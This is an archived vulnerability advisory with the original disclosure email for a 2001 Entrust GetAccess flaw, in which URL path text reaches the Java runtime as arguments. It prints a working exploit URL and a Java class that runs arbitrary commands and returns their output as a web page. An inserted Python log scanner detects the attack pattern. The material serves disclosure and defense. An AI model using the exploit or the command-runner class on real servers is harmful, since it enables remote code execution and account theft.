SecurityTracker.com
Category: Application (Security) > GetAccess
Vendors: Entrust
Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server
SecurityTracker Alert ID: 1002103
SecurityTracker URL: http://securitytracker.com/id/1002103
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 28 2001
Impact: Execution of arbitrary code via network
Exploit Included: Yes

Description: A vulnerability was reported in Entrust's GetAccess single sign-on software that allows remote users to start Java programs that reside on the GetAccess server.

The vulnerability is reportedly due to the lack of input validation in the login modules: the extra path component of the request URL is passed on to the GetAccess CGI shell script, which forwards it to the Java runtime as command-line arguments.

To trigger this vulnerability, the remote user must identify an exploitable GetAccess Java class (a class that accepts input parameters). Then, the remote user can access a URL to cause the Java program to be executed.

An example URL that will execute the 'cmd.class' Java class (which is not part of Entrust's GetAccess) is:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

When the remote user accesses this URL, the GetAccess server will run "/whereever/cmd.class" and execute "/bin/ls -alsi".
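As an added example (not from the advisory or the original poster), a small Python checker that scans web-server access-log lines for the request pattern described above: a trailing PATH_INFO component after a *.gas.bat script that decodes to whitespace-separated arguments or a -classpath override. The log lines, client addresses and the logout.gas.bat name are constructed samples; sek-bin and login.gas.bat come from the advisory.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jul/2001:11:33:54 +0200] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 512
10.0.0.7 - - [27/Jul/2001:11:34:10 +0200] "GET /sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 2048
10.0.0.9 - - [27/Jul/2001:11:35:02 +0200] "GET /sek-bin/logout.gas.bat/%20x HTTP/1.0" 500 88
10.0.0.9 - - [27/Jul/2001:11:35:40 +0200] "GET /images/logo.gif HTTP/1.0" 200 1200
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Everything after the script name is PATH_INFO that the .gas.bat shell
# script receives; a benign login request has no trailing path component.
GAS_BAT_RE = re.compile(r"^/sek-bin/(?P<script>[^/]+\.gas\.bat)(?P<info>/.*)?$",
                        re.IGNORECASE)


def classify(path):
    """Return (script, reason) when the request path carries injected
    arguments for a *.gas.bat script, otherwise None."""
    m = GAS_BAT_RE.match(path.split("?", 1)[0])
    if not m or not m.group("info"):
        return None
    info = unquote(m.group("info"))  # decode %20 etc. before inspecting
    if "-classpath" in info:
        return m.group("script"), "classpath override in PATH_INFO"
    if re.search(r"\s", info):
        return m.group("script"), "whitespace in PATH_INFO (extra shell arguments)"
    return None


def scan_log(text):
    """Return [(client_ip, script, reason)] for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group("path"))
        if verdict:
            hits.append((line.split(" ", 1)[0],) + verdict)
    return hits


if __name__ == "__main__":
    for ip, script, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {script}: {reason}")
```

The same PATH_INFO check can be applied in front of the CGI directory (a rewrite rule or reverse-proxy filter that rejects any request with a trailing component after the script name) until the vendor fix is installed.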

Impact: A remote user can start Java programs that reside on the GetAccess server.
Solution: No solution was available at the time of this entry.
Vendor URL: www.entrust.com/getaccess/
Cause: Input validation error
Underlying OS: UNIX (Solaris - SunOS), Windows (NT)

Message History: This archive entry has one or more follow-up message(s) listed below.
(Entrust Releases Fix) Re: Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server ("MARTAK,PAVEL (HP-Czechia,ex1)" <pavel_martak@hp.com>)
The vendor has released a fix.



Source Message Contents

Date:  Fri, 27 Jul 2001 11:33:54
Subject:  Entrust - getAccess



hola friends,

getAccess[tm] is used as a single-sign-on system often used for large 
internet-portals.

--- snip (http://www.entrust.com) ---

Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing basic and enhanced security across online applications, from Web browsers, to enterprise applications and legacy database systems.

--- snip ---

problem description:

due to missing input-validation it is possible to run(start) java-programs on the "getaccess"-machine.
combined with publicly accessible uploads or any other possibility to create class-files on the server this vulnerability could be used to run arbitrary system commands on the target machine (or change getAccess parameters and steal any user account you want BTW).

it should also be possible (but not proven yet) to exploit default-, install- or demo classes within Java or getAccess which would make the file-upload (creation) part unneeded!
(uninstall.class is very likely an effective DoS)


Example:

find an exploitable getAccess-class (one which accepts params!) or upload a "command" program:

--- cut here (example cmd.java) ---

import java.io.*;

public class cmd {
    public static void main(String args[]) {
        String s = null;  // the posted code omitted the type declaration
        try {
            // run args[0] with args[1] as its argument and echo its output as a CGI response
            Process p = Runtime.getRuntime().exec(args[0] + " " + args[1]);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
            System.out.println("Content-type: text/html\n\n");
            while ((s = stdInput.readLine()) != null) { System.out.println(s); }
            while ((s = stdError.readLine()) != null) { System.out.println(s); }
            System.exit(0);
        }
        catch (IOException e) { e.printStackTrace(); System.exit(-1); }
    }
}

--- cut here ---


later then .. an http-request to:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"


Summary:

object: *.gas.bat  (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes

vendor: has been informed with a separate e-mail ( entrust@entrust.com )


(and BTW. i would NEVER EVER recommend to use shell-scripts for authentication purposes!)


nice day,


rC

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com/security/
Copyright 2013, SecurityGlobal.net LLC